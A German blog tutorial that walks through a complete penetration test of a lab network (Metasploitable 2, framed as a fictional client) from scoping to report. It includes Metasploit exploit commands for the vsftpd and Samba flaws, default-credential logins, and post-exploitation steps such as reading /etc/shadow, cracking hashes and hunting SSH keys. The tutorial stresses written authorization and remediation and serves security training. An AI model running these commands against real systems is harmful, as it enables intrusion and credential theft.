Menü
Über mich Leistungen Werdegang Zusammenarbeiten
Security operations center
Sicherheit 8 Mär., 2026 • 30 Min. Lesezeit

Das vollständige Audit: Ein Penetrationstest von Anfang bis Ende

Put it all together. Walk through a complete penetration test from scoping to final report. The capstone of The Hacker's Path series.

Teilen:
Lee Foropoulos

Lee Foropoulos

30 Min. Lesezeit

Der Hacker-Pfad: 5-Teile-Serie

Teil 1: EinführungTeil 2: Flipper-MeisterschaftTeil 3: Kali-GrundlagenTeil 4: ExploitationTeil 5: Das vollständige Audit

Sie haben diese Serie mit der Frage begonnen, was Hacker eigentlich tun. Sie haben gelernt, dass es nicht um Kapuzenpullis und grünen Text geht. Es ist methodische Problemlösung. Sie haben Ausweise geklont, Netzwerke kartiert, Handshakes erfasst und Shells auf verwundbaren Maschinen erhalten.

Jetzt fügen wir alles zusammen. Dieser Artikel führt Sie durch einen kompletten Penetrationstest gegen ein fiktives Ziel. Jede Phase, jede Entscheidung, jeder Fund, dokumentiert genau wie es ein Profi tun würde.

Das Szenario

Kunde: Initech Labs (ein fiktives kleines Tech-Unternehmen)

Umfang: Interner Netzwerk-Penetrationstest

Ziel: Schwachstellen identifizieren und potenzielle geschäftliche Auswirkungen demonstrieren

Ihr Ziel: Ihr eigenes Lab-Netzwerk (Kali + Metasploitable 2 + andere VMs, die Sie eingerichtet haben)

Holen Sie sich einen Kaffee. Das wird spaßig.

Phase 1: Vor-Engagement

Bevor Sie eine Tastatur berühren, kümmern sich professionelle Pentester um die geschäftliche Seite. Überspringen Sie das, und Sie sind kein Penetrationstester. Sie sind einfach jemand, der Straftaten begeht.

Das Scoping-Gespräch

In einem echten Engagement hätten Sie ein Gespräch mit dem Kunden, um zu verstehen:

  • Was ist im Umfang? Welche Netzwerke, IP-Bereiche, Anwendungen?
  • Was ist außerhalb des Umfangs? Produktionssysteme? Drittanbieter-Dienste?
  • Testfenster? Wann können Sie testen? Nur während der Geschäftszeiten?
  • Ansprechpartner? Wen rufen Sie an, wenn etwas kaputtgeht?
  • Ziele? Compliance-Checkbox oder echte Sicherheitsverbesserung?

Für Ihr Labor

Umfang: Nur Ihr isoliertes Lab-Netzwerk. Außerhalb des Umfangs: Alles andere auf der Welt. Testfenster: Wann immer Sie wollen. Ziel: Lernen durch Praxis.

Engagement-Regeln

Echte Engagements haben schriftliche Regeln. Folgendes decken sie typischerweise ab:

  • Genehmigungsschreiben - Unterschriebenes Dokument, das Ihre Erlaubnis belegt
  • Eskalationsverfahren - Was tun, wenn Sie etwas Kritisches finden
  • Datenhandhabung - Wie Sie mit sensiblen Daten umgehen, die Sie finden
  • Bereinigungsanforderungen - Alle Tools und Hintertüren nach Abschluss entfernen
  • Berichtszeitplan - Wann ist der Abschlussbericht fällig?

Holen Sie Sich Immer Schriftliche Genehmigung

Selbst für "freundliche" Tests im Netzwerk eines Freundes. Eine unterschriebene E-Mail mit "Sie haben die Erlaubnis, mein Netzwerk von DATUM bis DATUM zu testen" könnte der Unterschied zwischen einer Lernerfahrung und einer Verurteilung sein. Nehmen Sie das ernst.

Phase 2: Aufklärung

Zeit, alles über das Ziel zu erfahren. In einem echten Engagement würde dies OSINT umfassen: Google-Suchen, LinkedIn-Profile, Unternehmenswebseiten, DNS-Einträge. Für unser Labor springen wir direkt zur aktiven Aufklärung.

Schritt 1: Netzwerkerkennung

Erste Frage: Was ist in diesem Netzwerk?

bash# Finden Sie Ihren Netzwerkbereich
ip a | grep inet
# Suchen Sie nach: inet 192.168.56.100/24

# Entdecken Sie alle aktiven Hosts
sudo nmap -sn 192.168.56.0/24 -oA discovery

# Ergebnisse (Beispiel):
Nmap scan report for 192.168.56.1
Host is up (0.00032s latency).
Nmap scan report for 192.168.56.101
Host is up (0.00089s latency).
Nmap scan report for 192.168.56.102
Host is up (0.00045s latency).

Dokumentieren Sie alles. Erstellen Sie eine Notiz wie diese:

text# Initech Labs - Netzwerkerkennung
# Datum: 2026-03-08
# Tester: Ihr Name

192.168.56.1   - Gateway/Router
192.168.56.101 - Unbekannt (zu untersuchen)
192.168.56.102 - Unbekannt (zu untersuchen)

Schritt 2: Port-Scanning

Jetzt graben wir tiefer. Welche Dienste laufen?

bash# Vollständiger Port-Scan mit Diensterkennung
sudo nmap -sV -sC -p- -oA full_scan 192.168.56.101

# Das dauert eine Weile. Für schnellere Ergebnisse beim Lernen:
sudo nmap -sV -sC --top-ports 1000 -oA quick_scan 192.168.56.101

Auf Metasploitable 2 sehen Sie eine Schatzkammer:

textPORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
22/tcp   open  ssh         OpenSSH 4.7p1
23/tcp   open  telnet      Linux telnetd
25/tcp   open  smtp        Postfix smtpd
80/tcp   open  http        Apache httpd 2.2.8
139/tcp  open  netbios-ssn Samba smbd 3.X
445/tcp  open  netbios-ssn Samba smbd 3.X
3306/tcp open  mysql       MySQL 5.0.51a
5432/tcp open  postgresql  PostgreSQL DB
...

Was für eine Exposition. Aktualisieren wir unsere Notizen:

text192.168.56.101 - Linux Server (Metasploitable)
  - FTP (21): vsftpd 2.3.4       # Bekannte Hintertür!
  - SSH (22): OpenSSH 4.7p1      # Uralt
  - Telnet (23): Aktiv            # Warum gibt es das 2026 noch?
  - HTTP (80): Apache 2.2.8      # Web-Apps zum Testen
  - SMB (139/445): Samba 3.X     # Potenzielle Goldgrube
  - MySQL (3306): 5.0.51a        # Datenbankzugang?
  - PostgreSQL (5432): Aktiv     # Weitere DB

Schritt 3: Schwachstellen-Identifikation

Zeit zu sehen, was tatsächlich ausnutzbar ist.

bash# Schwachstellen-Skripte ausführen
sudo nmap --script vuln -oA vuln_scan 192.168.56.101

# Spezifische Dienste in Metasploit prüfen
msfconsole
msf6 > search vsftpd
msf6 > search samba 3
msf6 > search apache 2.2

Die vsftpd 2.3.4 Hintertür springt sofort ins Auge. Das ist ein garantierter Shell. Aber ein guter Pentester hört nicht beim ersten Fund auf. Sie dokumentieren alles.

Serverraum mit blinkender Netzwerkausrüstung
Gründliche Aufklärung kartiert die gesamte Angriffsfläche, bevor ein einziger Exploit gestartet wird. Jeder offene Port und jede Dienstversion wird zu einem Datenpunkt in Ihrer Bewertung.

Phase 3: Exploitation

Hier wird es spannend. Wir haben mehrere potenzielle Einstiegspunkte. Arbeiten wir sie systematisch durch.

Angriffsvektor 1: FTP-Hintertür

bashmsf6 > use exploit/unix/ftp/vsftpd_234_backdoor
msf6 exploit(...) > set RHOSTS 192.168.56.101
msf6 exploit(...) > exploit

[*] Banner: 220 (vsFTPd 2.3.4)
[*] USER: 331 Please specify the password.
[+] Backdoor service has been spawned
[+] Command shell session 1 opened

whoami
root

id
uid=0(root) gid=0(root)

Fund dokumentiert: Root-Shell über FTP-Hintertür erhalten. Zeit vom ersten Scan bis zur vollständigen Kompromittierung: ungefähr 10 Minuten.

Root-Shell über FTP-Hintertür erhalten. Zeit vom ersten Scan bis zur vollständigen Kompromittierung: ungefähr 10 Minuten.

Aber wir hören hier nicht auf. Was können wir noch erreichen?

Angriffsvektor 2: Samba

bash# Aktuelle Sitzung in den Hintergrund
background

msf6 > use exploit/multi/samba/usermap_script
msf6 exploit(...) > set RHOSTS 192.168.56.101
msf6 exploit(...) > exploit

[*] Command shell session 2 opened

whoami
root

Noch ein Root-Shell über einen anderen Vektor. Das sind zwei unabhängige Wege zur vollständigen Kompromittierung.

Angriffsvektor 3: Webanwendungen

Schauen wir, was auf Port 80 läuft.

bash# Web-Verzeichnisse enumerieren
gobuster dir -u http://192.168.56.101 -w /usr/share/wordlists/dirb/common.txt

# Ergebnisse:
/cgi-bin/     (Status: 403)
/dav/         (Status: 301)
/icons/       (Status: 301)
/index        (Status: 200)
/phpMyAdmin/  (Status: 301)
/phpinfo      (Status: 200)
/test/        (Status: 301)
/twiki/       (Status: 301)

# Nikto für weitere Funde ausführen
nikto -h http://192.168.56.101

phpMyAdmin mit Standard-Zugangsdaten? Prüfen wir:

text# Häufige Zugangsdaten versuchen
Username: root
Password: (leer)

# Zugang gewährt!

Datenbank-Administratorzugang ohne Passwort. Von hier könnten wir alle Daten extrahieren, Datensätze ändern oder MySQLs Dateioperationen nutzen, um einen Web-Shell zu schreiben.

Angriffsvektor 4: Schwache SSH-Zugangsdaten

bashmsf6 > use auxiliary/scanner/ssh/ssh_login
msf6 auxiliary(...) > set RHOSTS 192.168.56.101
msf6 auxiliary(...) > set USERNAME msfadmin
msf6 auxiliary(...) > set PASSWORD msfadmin
msf6 auxiliary(...) > run

[+] 192.168.56.101:22 - Success: 'msfadmin:msfadmin'

Schwache Zugangsdaten gewähren SSH-Zugang. Nicht root, aber darum kümmern wir uns in der Post-Exploitation.

Phase 4: Post-Exploitation

Wir haben Zugang. Was jetzt? Ein echter Penetrationstest demonstriert die geschäftlichen Auswirkungen. Was kann ein Angreifer tatsächlich mit diesem Zugang tun?

Zugangsdaten-Ernte

bash# Aus unserem Root-Shell
cat /etc/shadow
root:$1$xyz...truncated...:14889:0:99999:7:::
msfadmin:$1$abc...truncated...:14889:0:99999:7:::
user:$1$def...truncated...:14889:0:99999:7:::
postgres:$1$ghi...truncated...:14889:0:99999:7:::

# Für Offline-Cracking speichern
cat /etc/passwd > /tmp/passwd.txt
cat /etc/shadow > /tmp/shadow.txt

# Auf Kali cracken
unshadow passwd.txt shadow.txt > combined.txt
john --wordlist=/usr/share/wordlists/rockyou.txt combined.txt

Netzwerkaufklärung (Von Innen)

bash# Welche anderen Netzwerke kann diese Maschine erreichen?
ifconfig
route -n
cat /etc/hosts
arp -a

# Was verbindet sich mit dieser Maschine?
netstat -tulpn
ss -tulpn

# SSH-Schlüssel suchen (für Lateral Movement)
find / -name "id_rsa" 2>/dev/null
find / -name "authorized_keys" 2>/dev/null

Entdeckung sensibler Daten

bash# Interessante Dateien suchen
find / -name "*.conf" 2>/dev/null | head -20
find / -name "*.sql" 2>/dev/null
find / -name "*.bak" 2>/dev/null
find / -name "*password*" 2>/dev/null

# Häufige Konfigurationsorte prüfen
cat /var/www/*/config.php 2>/dev/null
cat /etc/mysql/my.cnf

# Datenbank-Enumeration
mysql -u root -p  # Leeres Passwort versuchen
mysql> SHOW DATABASES;
mysql> SELECT * FROM mysql.user;

Privilegien-Eskalation (von msfadmin)

Erinnern Sie sich an die SSH-Anmeldung als msfadmin? Eskalieren wir zu root mit dem, was wir in Teil 4 gelernt haben.

bash# SSH als msfadmin
ssh [email protected]

# Sudo-Berechtigungen prüfen
sudo -l
# (Ausgabe variiert, aber prüfen wir andere Vektoren)

# SUID-Binaries finden
find / -perm -4000 2>/dev/null

# Schreibbare Skripte suchen, die von root ausgeführt werden
cat /etc/crontab

# LinPEAS hochladen und ausführen
# (Im echten Szenario bereits in Teil 4 behandelt)
Fachmann arbeitet am Schreibtisch mit Cybersicherheits-Tools
Post-Exploitation demonstriert die realen geschäftlichen Auswirkungen. Der Unterschied zwischen einem Schwachstellen-Scan und einem Penetrationstest ist der Nachweis, was ein Angreifer tatsächlich mit dem Zugang tun kann.

Phase 5: Dokumentation und Funde

Der Test ist nutzlos ohne einen Bericht. Das trennt Profis von Script Kiddies. Sie müssen erklären, was Sie gefunden haben, warum es wichtig ist und wie man es behebt.

Zusammenfassung der Funde

Hier ist, was wir im Netzwerk von "Initech Labs" gefunden haben, formatiert wie in einem echten Bericht:

KRITISCH: FTP-Dienst-Hintertür (CVE-2011-2523)

Betroffenes System: 192.168.56.101

Risiko: Nicht-authentifizierte Remote-Codeausführung als root

Beweis: Vollständiger Root-Shell in weniger als 60 Sekunden erhalten

Empfehlung: vsftpd sofort auf aktuelle Version aktualisieren oder FTP-Dienst vollständig deaktivieren.

KRITISCH: Samba Remote-Codeausführung

Betroffenes System: 192.168.56.101

Risiko: Nicht-authentifizierte Remote-Codeausführung als root

Beweis: Vollständiger Root-Shell über usermap_script Exploit erhalten

Empfehlung: Samba auf aktuelle Version aktualisieren. SMB-Zugriff nur auf notwendige Systeme beschränken.

HOCH: MySQL Root-Zugang ohne Passwort

Betroffenes System: 192.168.56.101

Risiko: Vollständige Datenbank-Kompromittierung, Datendiebstahl, Web-Shell-Deployment

Beweis: Als root mit leerem Passwort über phpMyAdmin angemeldet

Empfehlung: Starkes Root-Passwort setzen. phpMyAdmin-Zugriff beschränken. phpMyAdmin-Entfernung erwägen.

HOCH: Schwache SSH-Zugangsdaten

Betroffenes System: 192.168.56.101

Risiko: Authentifizierter Zugang führt zu Privilegien-Eskalation

Beweis: msfadmin:msfadmin erfolgreich authentifiziert

Empfehlung: Starke Passwort-Richtlinie durchsetzen. SSH-Schlüssel-basierte Authentifizierung implementieren. fail2ban erwägen.

MITTEL: Telnet-Dienst aktiviert

Betroffenes System: 192.168.56.101

Risiko: Zugangsdaten werden im Klartext übertragen

Beweis: Port 23 offen und akzeptiert Verbindungen

Empfehlung: Telnet deaktivieren. SSH für alle Remote-Administration verwenden.

NIEDRIG: Exponierte phpinfo()-Seite

Betroffenes System: 192.168.56.101

Risiko: Informationspreisgabe unterstützt weitere Angriffe

Beweis: http://192.168.56.101/phpinfo ohne Authentifizierung erreichbar

Empfehlung: phpinfo-Seiten entfernen oder Zugriff beschränken.

Executive Summary

Das ist, was Führungskräfte tatsächlich lesen. Halten Sie es kurz, wirkungsvoll und ohne Fachjargon:

Executive Summary

Während des Penetrationstests des internen Netzwerks von Initech Labs erlangte das Sicherheitsteam innerhalb von 10 Minuten nach Beginn der Bewertung vollständige administrative Kontrolle über den Hauptserver.

Wichtigste Funde:

10 min
Zeit vom ersten Scan bis zur vollständigen Root-Kompromittierung eines Servers mit ungepatchten Diensten.
  • 2 kritische Schwachstellen, die sofortige Remote-Übernahme ermöglichen
  • 2 hochschwere Probleme, die Datenbanken und Benutzerzugangsdaten offenlegen
  • Mehrere mittlere und niedrige Funde, die auf systemische Sicherheitslücken hinweisen

Fazit: Ein Angreifer mit Grundkenntnissen könnte dieses System innerhalb von Minuten vollständig kompromittieren. Sofortige Behebung ist für alle kritischen und hohen Funde erforderlich. Eine Nachbewertung wird nach Anwendung der Korrekturen empfohlen.

Phase 6: Bereinigung und Abschluss

Ein professioneller Pentester hinterlässt die Umgebung genau so, wie er sie vorgefunden hat.

bash# Alle Sitzungen dokumentieren
msf6 > sessions -l

# Alle Sitzungen beenden
msf6 > sessions -K

# Auf dem Ziel (wenn Sie Dateien erstellt haben):
rm /tmp/linpeas.sh
rm /tmp/*.txt

# Erstellte Benutzer entfernen
userdel testuser

# Hinzugefügte SSH-Schlüssel entfernen
rm /home/*/.ssh/authorized_keys

# Alles dokumentieren, was Sie entfernt haben

In einem echten Engagement würden Sie auch:

  • Alle während der Tests hochgeladenen Tools entfernen
  • Alle Änderungen an der Umgebung dokumentieren
  • Hashes/Checksummen extrahierter Daten bereitstellen
  • Alle Kundendaten nach Berichtslieferung sicher löschen

Die Vollständige Methodologie-Checkliste

Hier ist Ihr wiederverwendbarer Workflow für jeden Penetrationstest:

Penetrationstest-Methodologie

  1. Vor-Engagement
    • Umfang und Engagement-Regeln definieren
    • Schriftliche Genehmigung einholen
    • Kommunikationskanäle einrichten
    • Testumgebung aufsetzen
  2. Aufklärung
    • Netzwerkerkennung (Host-Enumeration)
    • Port-Scanning und Dienst-Identifikation
    • Schwachstellen-Scanning
    • Web-Anwendungs-Enumeration
    • Alles dokumentieren
  3. Exploitation
    • Schwachstellen validieren (Scannern nicht blind vertrauen)
    • Bestätigte Schwachstellen ausnutzen
    • Jede erfolgreiche Kompromittierung dokumentieren
    • Beweise erfassen (Screenshots, Logs)
  4. Post-Exploitation
    • Kompromittiertes System enumerieren
    • Zugangsdaten ernten
    • Sensible Daten identifizieren
    • Privilegien-Eskalation versuchen
    • Lateral-Movement-Möglichkeiten suchen
  5. Berichterstattung
    • Executive Summary schreiben (geschäftliche Auswirkungen)
    • Alle Funde mit Beweisen dokumentieren
    • Behebungsempfehlungen bereitstellen
    • Technische Details für IT-Teams einschließen
  6. Bereinigung
    • Alle Tools und Artefakte entfernen
    • Alle Sitzungen und Hintertüren schließen
    • Alle Umgebungsänderungen dokumentieren
    • Kundendaten sicher handhaben
Aktionsplan Vollständiges Audit 0/6

Was als Nächstes kommt: Ihr Weg

Sie haben Den Hacker-Pfad abgeschlossen. Sie sind von "was bedeutet Hacking?" zur Durchführung eines vollständigen Penetrationstests gekommen. Das ist wirklich beeindruckend.

Aber das ist erst der Anfang. Hier geht es weiter:

Übungsplattformen

  • Hack The Box - Realistische Maschinen zum Üben. Beginnen Sie mit "einfachen" zurückgezogenen Boxen.
  • TryHackMe - Geführte Lernpfade. Ausgezeichnet für strukturierten Fortschritt.
  • VulnHub - Kostenlose verwundbare VMs zum Download und lokalen Üben.
  • PentesterLab - Fokus auf Web-Anwendungssicherheit.

Zertifizierungen (Falls Gewünscht)

  • eJPT (eLearnSecurity Junior Penetration Tester) - Ausgezeichneter Einstieg, praktische Prüfung
  • OSCP (Offensive Security Certified Professional) - Der Industriestandard, brutal aber respektiert
  • PNPT (Practical Network Penetration Tester) - Modern, praktisch, beinhaltet Berichtsschreibung
  • CEH (Certified Ethical Hacker) - Für Unternehmensanforderungen, weniger praktisch

Spezialisierungen

  • Web-Anwendungssicherheit - OWASP, Burp Suite, SQL-Injection, XSS
  • Active Directory - Die meisten Unternehmensumgebungen nutzen es
  • Cloud-Sicherheit - AWS, Azure, GCP Pentesting
  • Mobile Sicherheit - Android/iOS Anwendungstests
  • Red Teaming - Vollständige Angreifer-Simulation, physisch + digital
  • Reverse Engineering - Malware-Analyse, Exploit-Entwicklung

Bauen Sie Ihr Heimlabor

Die besten Pentester haben aufwändige Heimlabore. Beginnen Sie einfach und erweitern Sie:

  • Fügen Sie Windows Server mit Active Directory hinzu
  • Richten Sie einen Domain Controller ein
  • Deployen Sie verwundbare Webanwendungen (DVWA, bWAPP, WebGoat)
  • Bauen Sie ein Netzwerk mit mehreren Segmenten
  • Fügen Sie HoneyAegis hinzu, um Angriffe aus der Verteidiger-Perspektive zu sehen

Der Hacker-Pfad: Abgeschlossen

Sie haben es geschafft. Alle fünf Teile, von neugierig zu kompetent.

Teil 1: Einführung Teil 2: Flipper-Meisterschaft Teil 3: Kali-Grundlagen Teil 4: Exploitation Teil 5: Das vollständige Audit

Serie Abgeschlossen - Ihre Reise

Teil 1: Sie haben gelernt, was Hacking wirklich ist, und Ihre ersten Erfolge mit dem Flipper Zero erzielt

Teil 2: Sie haben jedes Flipper-Protokoll gemeistert: Sub-GHz, RFID, NFC, BadUSB, GPIO

Teil 3: Sie haben Ihr Kali-Labor aufgebaut, nmap gelernt und WiFi-Handshakes erfasst

Teil 4: Sie haben Metasploit, Exploitation, Privilegien-Eskalation und Pivoting gemeistert

Teil 5: Sie haben alles zu einer vollständigen Penetrationstest-Methodologie zusammengefügt

Sicherheit ist kein Ziel. Es ist eine Praxis. Die Werkzeuge werden sich ändern, die Schwachstellen werden sich entwickeln, aber die Methodologie bleibt gleich. Hinterfragen Sie alles. Dokumentieren Sie alles. Hören Sie nie auf zu lernen.

Willkommen auf der anderen Seite.

  • Lee
How was this article?

Teilen

Link copied to clipboard!

You Might Also Like

Lee Foropoulos

Lee Foropoulos

Business Development Lead at Lookatmedia, fractional executive, and founder of gotHABITS.

🔔

Keinen Beitrag verpassen

Erhalten Sie eine Benachrichtigung bei neuen Artikeln. Keine E-Mail erforderlich.

Sie sehen ein Banner auf der Seite bei einem neuen Beitrag, plus eine Browser-Benachrichtigung wenn erlaubt.

Nur Browser-Benachrichtigungen. Kein Spam, keine E-Mail.